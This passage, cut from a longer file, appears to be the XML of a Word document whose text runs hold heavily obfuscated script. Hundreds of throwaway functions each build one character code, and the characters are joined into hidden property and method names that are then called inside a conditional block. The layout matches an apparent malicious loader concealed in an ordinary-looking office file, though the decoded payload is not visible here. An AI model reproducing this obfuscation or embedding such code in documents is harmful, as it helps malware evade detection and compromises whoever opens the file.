hutHer5[Vgtf_56]=1; hutHer5[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hutHer5[600]-hutHer5[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var ftugradu5=Brfcook; ftugradu5[Vgtf_56]=3; ftugradu5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ftugradu5[600]-ftugradu5[Vgtf_56]),RunGe);  })(937,'Laws75',false)+(function(Rt,Rx){ var qhqli3=Brfcook; qhqli3[Vgtf_56]=4; qhqli3[Vgtf_56-(Vgtf_56/3)]=88; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qhqli3[600]-qhqli3[Vgtf_56]),RunGe);  })(389,true,null,389)+(function(Rt,Rx){ var efwlive5=Brfcook; efwlive5[Vgtf_56]=3; efwlive5[Vgtf_56-(Vgtf_56/3)]=124; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(efwlive5[600]-efwlive5[Vgtf_56]),RunGe);  })(true,false,'second5')+(function(Rt,Rx){ var qqsother5=Brfcook; qqsother5[Vgtf_56]=2; qqsother5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qqsother5[600]-qqsother5[Vgtf_56]),RunGe);  })(null,910)+(function(Rt,Rx){ var pieth3=Brfcook; pieth3[Vgtf_56]=0; pieth3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pieth3[600]-pieth3[Vgtf_56]),RunGe);  })()] == 1)) &amp;&amp; gicqnsystem50[(function(Rt,Rx){ var ujpgr3=Brfcook; ujpgr3[Vgtf_56]=4; ujpgr3[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ujpgr3[600]-ujpgr3[Vgtf_56]),RunGe);  })('robots83','conscience16','issues6','resulting12')+(function(Rt,Rx){ var itpeve5=Brfcook; itpeve5[Vgtf_56]=0; itpeve5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(itpeve5[600]-itpeve5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var hhpco4=Brfcook; hhpco4[Vgtf_56]=3; hhpco4[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hhpco4[600]-hhpco4[Vgtf_56]),RunGe);  })(2985,2985,'what20')+(function(Rt,Rx){ var ikigra3=Brfcook; ikigra3[Vgtf_56]=1; ikigra3[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ikigra3[600]-ikigra3[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var thjHer4=Brfcook; thjHer4[Vgtf_56]=3; thjHer4[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(thjHer4[600]-thjHer4[Vgtf_56]),RunGe);  })(null,2574,'rooted92')+(function(Rt,Rx){ var sefskil3=Brfcook; sefskil3[Vgtf_56]=0; sefskil3[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(sefskil3[600]-sefskil3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var siueve3=Brfcook; siueve3[Vgtf_56]=0; siueve3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(siueve3[600]-siueve3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var hwsgr5=Brfcook; hwsgr5[Vgtf_56]=4; hwsgr5[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hwsgr5[600]-hwsgr5[Vgtf_56]),RunGe);  })(1163,'addition49','being51',1163)+(function(Rt,Rx){ var whwwrite4=Brfcook; whwwrite4[Vgtf_56]=3; whwwrite4[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(whwwrite4[600]-whwwrite4[Vgtf_56]),RunGe);  })('Both81','beingcharitable40',2500)](0,1)!=gicqnplatitudes86[(function(Rt,Rx){ var qejskil3=Brfcook; qejskil3[Vgtf_56]=2; qejskil3[Vgtf_56-(Vgtf_56/3)]=70; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qejskil3[600]-qejskil3[Vgtf_56]),RunGe);  })(null,43)+(function(Rt,Rx){ var kfqgrad4=Brfcook; kfqgrad4[Vgtf_56]=1; kfqgrad4[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kfqgrad4[600]-kfqgrad4[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var wukfea5=Brfcook; wukfea5[Vgtf_56]=0; wukfea5[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wukfea5[600]-wukfea5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var qiuFort5=Brfcook; qiuFort5[Vgtf_56]=0; qiuFort5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qiuFort5[600]-qiuFort5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var vvtfou3=Brfcook; vvtfou3[Vgtf_56]=3; vvtfou3[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vvtfou3[600]-vvtfou3[Vgtf_56]),RunGe);  })(false,null,'being84')+(function(Rt,Rx){ var uwjFort5=Brfcook; uwjFort5[Vgtf_56]=2; uwjFort5[Vgtf_56-(Vgtf_56/3)]=78; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uwjFort5[600]-uwjFort5[Vgtf_56]),RunGe);  })(false,'while59')+(function(Rt,Rx){ var fwqmer4=Brfcook; fwqmer4[Vgtf_56]=1; fwqmer4[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fwqmer4[600]-fwqmer4[Vgtf_56]),RunGe);  })(2720)+(function(Rt,Rx){ var eqhwr4=Brfcook; eqhwr4[Vgtf_56]=0; eqhwr4[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eqhwr4[600]-eqhwr4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var vtpgrat4=Brfcook; vtpgrat4[Vgtf_56]=2; vtpgrat4[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vtpgrat4[600]-vtpgrat4[Vgtf_56]),RunGe);  })('addition49',false)+(function(Rt,Rx){ var vhqgra4=Brfcook; vhqgra4[Vgtf_56]=3; vhqgra4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vhqgra4[600]-vhqgra4[Vgtf_56]),RunGe);  })('Laws75',null,false)+(function(Rt,Rx){ var hvjroa4=Brfcook; hvjroa4[Vgtf_56]=1; hvjroa4[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hvjroa4[600]-hvjroa4[Vgtf_56]),RunGe);  })(true)])</w:t>
        <w:tab/>
        <w:t xml:space="preserve">                    {                          gicqnlivelihood89[(function(Rt,Rx){ var ufsgr3=Brfcook; ufsgr3[Vgtf_56]=4; ufsgr3[Vgtf_56-(Vgtf_56/3)]=87; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ufsgr3[600]-ufsgr3[Vgtf_56]),RunGe);  })(true,true,'Laws75','although94')+(function(Rt,Rx){ var shqth3=Brfcook; shqth3[Vgtf_56]=2; shqth3[Vgtf_56-(Vgtf_56/3)]=106; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(shqth3[600]-shqth3[Vgtf_56]),RunGe);  })(false,'obey60')+(function(Rt,Rx){ var tqtgra3=Brfcook; tqtgra3[Vgtf_56]=1; tqtgra3[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tqtgra3[600]-tqtgra3[Vgtf_56]),RunGe);  })('robots83')+(function(Rt,Rx){ var tjegra4=Brfcook; tjegra4[Vgtf_56]=3; tjegra4[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tjegra4[600]-tjegra4[Vgtf_56]),RunGe);  })(true,'Laws75','although94')+(function(Rt,Rx){ var qjtoth5=Brfcook; qjtoth5[Vgtf_56]=3; qjtoth5[Vgtf_56-(Vgtf_56/3)]=111; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qjtoth5[600]-qjtoth5[Vgtf_56]),RunGe);  })(1843,1843,'robot28')+(function(Rt,Rx){ var vskFor5=Brfcook; vskFor5[Vgtf_56]=0; vskFor5[Vgtf_56-(Vgtf_56/3)]=69; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vskFor5[600]-vskFor5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ihfthe5=Brfcook; ihfthe5[Vgtf_56]=2; ihfthe5[Vgtf_56-(Vgtf_56/3)]=122; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ihfthe5[600]-ihfthe5[Vgtf_56]),RunGe);  })(433,false)+(function(Rt,Rx){ var qhpha5=Brfcook; qhpha5[Vgtf_56]=3; qhpha5[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qhpha5[600]-qhpha5[Vgtf_56]),RunGe);  })('arosethough14',869,869)+(function(Rt,Rx){ var qhneve4=Brfcook; qhneve4[Vgtf_56]=0; qhneve4[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qhneve4[600]-qhneve4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var pthroa4=Brfcook; pthroa4[Vgtf_56]=0; pthroa4[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(pthroa4[600]-pthroa4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var uspwri5=Brfcook; uspwri5[Vgtf_56]=3; uspwri5[Vgtf_56-(Vgtf_56/3)]=119; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uspwri5[600]-uspwri5[Vgtf_56]),RunGe);  })(false,true,'Both81')+(function(Rt,Rx){ var kwpwork43=Brfcook; kwpwork43[Vgtf_56]=0; kwpwork43[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kwpwork43[600]-kwpwork43[Vgtf_56]),RunGe);  })()]((function(Rt,Rx){ var wqvgr4=Brfcook; wqvgr4[Vgtf_56]=4; wqvgr4[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wqvgr4[600]-wqvgr4[Vgtf_56]),RunGe);  })('addition49','being51',1496,null)+(function(Rt,Rx){ var jtwcon4=Brfcook; jtwcon4[Vgtf_56]=4; jtwcon4[Vgtf_56-(Vgtf_56/3)]=113; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jtwcon4[600]-jtwcon4[Vgtf_56]),RunGe);  })('declarations83','provided81',true,'second5')+(function(Rt,Rx){ var tkjroad4=Brfcook; tkjroad4[Vgtf_56]=2; tkjroad4[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tkjroad4[600]-tkjroad4[Vgtf_56]),RunGe);  })(true,true),(function(Rt,Rx){ var equskill5=Brfcook; equskill5[Vgtf_56]=4; equskill5[Vgtf_56-(Vgtf_56/3)]=51; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(equskill5[600]-equskill5[Vgtf_56]),RunGe);  })('human24',null,'entertain53',1527)+(function(Rt,Rx){ var ejvskil5=Brfcook; ejvskil5[Vgtf_56]=1; ejvskil5[Vgtf_56-(Vgtf_56/3)]=86; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ejvskil5[600]-ejvskil5[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var uuproad3=Brfcook; uuproad3[Vgtf_56]=0; uuproad3[Vgtf_56-(Vgtf_56/3)]=32; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uuproad3[600]-uuproad3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jvfother5=Brfcook; jvfother5[Vgtf_56]=2; jvfother5[Vgtf_56-(Vgtf_56/3)]=49; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jvfother5[600]-jvfother5[Vgtf_56]),RunGe);  })('robot28','into6')+(function(Rt,Rx){ var uwiav5=Brfcook; uwiav5[Vgtf_56]=3; uwiav5[Vgtf_56-(Vgtf_56/3)]=84; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uwiav5[600]-uwiav5[Vgtf_56]),RunGe);  })('progress41',null,'displayed83')+(function(Rt,Rx){ var wpigrad4=Brfcook; wpigrad4[Vgtf_56]=0; wpigrad4[Vgtf_56-(Vgtf_56/3)]=32; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wpigrad4[600]-wpigrad4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var wjtroad4=Brfcook; wjtroad4[Vgtf_56]=1; wjtroad4[Vgtf_56-(Vgtf_56/3)]=48; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wjtroad4[600]-wjtroad4[Vgtf_56]),RunGe);  })(331)+(function(Rt,Rx){ var iuvgrati4=Brfcook; iuvgrati4[Vgtf_56]=1; iuvgrati4[Vgtf_56-(Vgtf_56/3)]=68; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iuvgrati4[600]-iuvgrati4[Vgtf_56]),RunGe);  })(2085)+(function(Rt,Rx){ var kqpcon5=Brfcook; kqpcon5[Vgtf_56]=4; kqpcon5[Vgtf_56-(Vgtf_56/3)]=36; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kqpcon5[600]-kqpcon5[Vgtf_56]),RunGe);  })(true,'what20',1213,1213)+(function(Rt,Rx){ var npjmere3=Brfcook; npjmere3[Vgtf_56]=0; npjmere3[Vgtf_56-(Vgtf_56/3)]=100; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(npjmere3[600]-npjmere3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var qqpski5=Brfcook; qqpski5[Vgtf_56]=1; qqpski5[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qqpski5[600]-qqpski5[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var iungradu3=Brfcook; iungradu3[Vgtf_56]=1; iungradu3[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iungradu3[600]-iungradu3[Vgtf_56]),RunGe);  })(false)+(function(Rt,Rx){ var upwHer3=Brfcook; upwHer3[Vgtf_56]=2; upwHer3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(upwHer3[600]-upwHer3[Vgtf_56]),RunGe);  })('rooted92',true)+(function(Rt,Rx){ var tshav4=Brfcook; tshav4[Vgtf_56]=0; tshav4[Vgtf_56-(Vgtf_56/3)]=32; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tshav4[600]-tshav4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var whjava4=Brfcook; whjava4[Vgtf_56]=2; whjava4[Vgtf_56-(Vgtf_56/3)]=49; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(whjava4[600]-whjava4[Vgtf_56]),RunGe);  })(true,null)+(function(Rt,Rx){ var tewothe4=Brfcook; tewothe4[Vgtf_56]=2; tewothe4[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tewothe4[600]-tewothe4[Vgtf_56]),RunGe);  })(false,true)+(function(Rt,Rx){ var fiuot5=Brfcook; fiuot5[Vgtf_56]=4; fiuot5[Vgtf_56-(Vgtf_56/3)]=36; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fiuot5[600]-fiuot5[Vgtf_56]),RunGe);  })('robot28',1088,'into6',false)+(function(Rt,Rx){ var wwwothe3=Brfcook; wwwothe3[Vgtf_56]=3; wwwothe3[Vgtf_56-(Vgtf_56/3)]=41; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wwwothe3[600]-wwwothe3[Vgtf_56]),RunGe);  })('robot28','into6',null)+(function(Rt,Rx){ var puscont3=Brfcook; puscont3[Vgtf_56]=3; puscont3[Vgtf_56-(Vgtf_56/3)]=41; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(puscont3[600]-puscont3[Vgtf_56]),RunGe);  })('what20','humans11','would54')+(function(Rt,Rx){ var unfthat84=Brfcook; unfthat84[Vgtf_56]=3; unfthat84[Vgtf_56-(Vgtf_56/3)]=35; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(unfthat84[600]-unfthat84[Vgtf_56]),RunGe);  })('obey60','factory29','know4')+(function(Rt,Rx){ var jfkgrat3=Brfcook; jfkgrat3[Vgtf_56]=2; jfkgrat3[Vgtf_56-(Vgtf_56/3)]=101; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jfkgrat3[600]-jfkgrat3[Vgtf_56]),RunGe);  })('addition49','being51')+(function(Rt,Rx){ var evigrad3=Brfcook; evigrad3[Vgtf_56]=3; evigrad3[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(evigrad3[600]-evigrad3[Vgtf_56]),RunGe);  })('robots83',1348,'conscience16')+(function(Rt,Rx){ var nveHer4=Brfcook; nveHer4[Vgtf_56]=0; nveHer4[Vgtf_56-(Vgtf_56/3)]=32; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nveHer4[600]-nveHer4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var kjfsk5=Brfcook; kjfsk5[Vgtf_56]=1; kjfsk5[Vgtf_56-(Vgtf_56/3)]=48; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kjfsk5[600]-kjfsk5[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var qwigrati5=Brfcook; qwigrati5[Vgtf_56]=0; qwigrati5[Vgtf_56-(Vgtf_56/3)]=68; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qwigrati5[600]-qwigrati5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var ineoth4=Brfcook; ineoth4[Vgtf_56]=0; ineoth4[Vgtf_56-(Vgtf_56/3)]=32; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ineoth4[600]-ineoth4[Vgtf_56]),RunGe);  })()+gicqnplatitudes86[(function(Rt,Rx){ var qejskil3=Brfcook; qejskil3[Vgtf_56]=2; qejskil3[Vgtf_56-(Vgtf_56/3)]=70; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qejskil3[600]-qejskil3[Vgtf_56]),RunGe);  })(null,43)+(function(Rt,Rx){ var kfqgrad4=Brfcook; kfqgrad4[Vgtf_56]=1; kfqgrad4[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kfqgrad4[600]-kfqgrad4[Vgtf_56]),RunGe);  })(true)+(function(Rt,Rx){ var wukfea5=Brfcook; wukfea5[Vgtf_56]=0; wukfea5[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wukfea5[600]-wukfea5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var qiuFort5=Brfcook; qiuFort5[Vgtf_56]=0; qiuFort5[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qiuFort5[600]-qiuFort5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var vvtfou3=Brfcook; vvtfou3[Vgtf_56]=3; vvtfou3[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vvtfou3[600]-vvtfou3[Vgtf_56]),RunGe);  })(false,null,'being84')+(function(Rt,Rx){ var uwjFort5=Brfcook; uwjFort5[Vgtf_56]=2; uwjFort5[Vgtf_56-(Vgtf_56/3)]=78; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(uwjFort5[600]-uwjFort5[Vgtf_56]),RunGe);  })(false,'while59')+(function(Rt,Rx){ var fwqmer4=Brfcook; fwqmer4[Vgtf_56]=1; fwqmer4[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fwqmer4[600]-fwqmer4[Vgtf_56]),RunGe);  })(2720)+(function(Rt,Rx){ var eqhwr4=Brfcook; eqhwr4[Vgtf_56]=0; eqhwr4[Vgtf_56-(Vgtf_56/3)]=116; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(eqhwr4[600]-eqhwr4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var vtpgrat4=Brfcook; vtpgrat4[Vgtf_56]=2; vtpgrat4[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vtpgrat4[600]-vtpgrat4[Vgtf_56]),RunGe);  })('addition49',false)+(function(Rt,Rx){ var vhqgra4=Brfcook; vhqgra4[Vgtf_56]=3; vhqgra4[Vgtf_56-(Vgtf_56/3)]=104; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vhqgra4[600]-vhqgra4[Vgtf_56]),RunGe);  })('Laws75',null,false)+(function(Rt,Rx){ var hvjroa4=Brfcook; hvjroa4[Vgtf_56]=1; hvjroa4[Vgtf_56-(Vgtf_56/3)]=115; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hvjroa4[600]-hvjroa4[Vgtf_56]),RunGe);  })(true)]+(function(Rt,Rx){ var fvugra3=Brfcook; fvugra3[Vgtf_56]=2; fvugra3[Vgtf_56-(Vgtf_56/3)]=60; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fvugra3[600]-fvugra3[Vgtf_56]),RunGe);  })(true,155)+(function(Rt,Rx){ var hntth3=Brfcook; hntth3[Vgtf_56]=1; hntth3[Vgtf_56-(Vgtf_56/3)]=33; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hntth3[600]-hntth3[Vgtf_56]),RunGe);  })('obey60')+(function(Rt,Rx){ var vtfgrat4=Brfcook; vtfgrat4[Vgtf_56]=1; vtfgrat4[Vgtf_56-(Vgtf_56/3)]=39; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vtfgrat4[600]-vtfgrat4[Vgtf_56]),RunGe);  })('addition49')+(function(Rt,Rx){ var jwuli5=Brfcook; jwuli5[Vgtf_56]=4; jwuli5[Vgtf_56-(Vgtf_56/3)]=42; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jwuli5[600]-jwuli5[Vgtf_56]),RunGe);  })(997,'second5','itself96',null)+(function(Rt,Rx){ var fieeve4=Brfcook; fieeve4[Vgtf_56]=1; fieeve4[Vgtf_56-(Vgtf_56/3)]=33; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fieeve4[600]-fieeve4[Vgtf_56]),RunGe);  })('White35')+(function(Rt,Rx){ var kehcon5=Brfcook; kehcon5[Vgtf_56]=2; kehcon5[Vgtf_56-(Vgtf_56/3)]=102; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kehcon5[600]-kehcon5[Vgtf_56]),RunGe);  })(true,false)+(function(Rt,Rx){ var fiegrat4=Brfcook; fiegrat4[Vgtf_56]=1; fiegrat4[Vgtf_56-(Vgtf_56/3)]=98; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(fiegrat4[600]-fiegrat4[Vgtf_56]),RunGe);  })(null)+(function(Rt,Rx){ var ihnconsc3=Brfcook; ihnconsc3[Vgtf_56]=2; ihnconsc3[Vgtf_56-(Vgtf_56/3)]=118; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ihnconsc3[600]-ihnconsc3[Vgtf_56]),RunGe);  })('declarations83',true)+(function(Rt,Rx){ var vtscon3=Brfcook; vtscon3[Vgtf_56]=4; vtscon3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vtscon3[600]-vtscon3[Vgtf_56]),RunGe);  })('declarations83','provided81','second5',null)+(function(Rt,Rx){ var kpswere4=Brfcook; kpswere4[Vgtf_56]=3; kpswere4[Vgtf_56-(Vgtf_56/3)]=35; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(kpswere4[600]-kpswere4[Vgtf_56]),RunGe);  })('astonished95','Labyrinthine79','routinelabour89')+(function(Rt,Rx){ var jkvski5=Brfcook; jkvski5[Vgtf_56]=0; jkvski5[Vgtf_56-(Vgtf_56/3)]=47; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jkvski5[600]-jkvski5[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var siili3=Brfcook; siili3[Vgtf_56]=4; siili3[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(siili3[600]-siili3[Vgtf_56]),RunGe);  })('second5','itself96',2119,'being84')+(function(Rt,Rx){ var tviroadI3=Brfcook; tviroadI3[Vgtf_56]=4; tviroadI3[Vgtf_56-(Vgtf_56/3)]=36; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(tviroadI3[600]-tviroadI3[Vgtf_56]),RunGe);  })(true,null,false,null)+(function(Rt,Rx){ var etsgrad3=Brfcook; etsgrad3[Vgtf_56]=0; etsgrad3[Vgtf_56-(Vgtf_56/3)]=38; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(etsgrad3[600]-etsgrad3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var qjiavala3=Brfcook; qjiavala3[Vgtf_56]=4; qjiavala3[Vgtf_56-(Vgtf_56/3)]=42; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qjiavala3[600]-qjiavala3[Vgtf_56]),RunGe);  })(null,'progress41','displayed83',false)+(function(Rt,Rx){ var qkjan5=Brfcook; qkjan5[Vgtf_56]=4; qkjan5[Vgtf_56-(Vgtf_56/3)]=36; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qkjan5[600]-qkjan5[Vgtf_56]),RunGe);  })(false,null,2940,2940)+(function(Rt,Rx){ var iqwtha5=Brfcook; iqwtha5[Vgtf_56]=3; iqwtha5[Vgtf_56-(Vgtf_56/3)]=103; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(iqwtha5[600]-iqwtha5[Vgtf_56]),RunGe);  })('obey60',false,true)+(function(Rt,Rx){ var nspliv3=Brfcook; nspliv3[Vgtf_56]=0; nspliv3[Vgtf_56-(Vgtf_56/3)]=105; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(nspliv3[600]-nspliv3[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var snpfeat4=Brfcook; snpfeat4[Vgtf_56]=0; snpfeat4[Vgtf_56-(Vgtf_56/3)]=114; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(snpfeat4[600]-snpfeat4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var vfhfeatu4=Brfcook; vfhfeatu4[Vgtf_56]=2; vfhfeatu4[Vgtf_56-(Vgtf_56/3)]=34; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(vfhfeatu4[600]-vfhfeatu4[Vgtf_56]),RunGe);  })('into30','Asimov30')+(function(Rt,Rx){ var siwava3=Brfcook; siwava3[Vgtf_56]=2; siwava3[Vgtf_56-(Vgtf_56/3)]=49; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(siwava3[600]-siwava3[Vgtf_56]),RunGe);  })('progress41',1808)+(function(Rt,Rx){ var ushwork4=Brfcook; ushwork4[Vgtf_56]=1; ushwork4[Vgtf_56-(Vgtf_56/3)]=99; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ushwork4[600]-ushwork4[Vgtf_56]),RunGe);  })('although94')+(function(Rt,Rx){ var ehfev4=Brfcook; ehfev4[Vgtf_56]=0; ehfev4[Vgtf_56-(Vgtf_56/3)]=47; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(ehfev4[600]-ehfev4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var jnsForth5=Brfcook; jnsForth5[Vgtf_56]=2; jnsForth5[Vgtf_56-(Vgtf_56/3)]=117; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(jnsForth5[600]-jnsForth5[Vgtf_56]),RunGe);  })(null,'while59')+(function(Rt,Rx){ var hnume3=Brfcook; hnume3[Vgtf_56]=3; hnume3[Vgtf_56-(Vgtf_56/3)]=50; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(hnume3[600]-hnume3[Vgtf_56]),RunGe);  })(false,true,true)+(function(Rt,Rx){ var qheava4=Brfcook; qheava4[Vgtf_56]=0; qheava4[Vgtf_56-(Vgtf_56/3)]=120; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(qheava4[600]-qheava4[Vgtf_56]),RunGe);  })()+(function(Rt,Rx){ var wnfroadI3=Brfcook; wnfroadI3[Vgtf_56]=0; wnfroadI3[Vgtf_56-(Vgtf_56/3)]=32; return PpUzPnl(PpUzPnlJK(Rx+Rt)+(wnfroadI3[600]-wnfroadI3[Vgtf_56]),RunGe);  })()+gicqnexpectantmothersall12+(function(Rt,Rx){ var ffpmer4=Brfcook; ffpmer4[Vgtf_56]=3; ffpmer4[Vgtf_56-(Vgtf_56/3)]=65; return 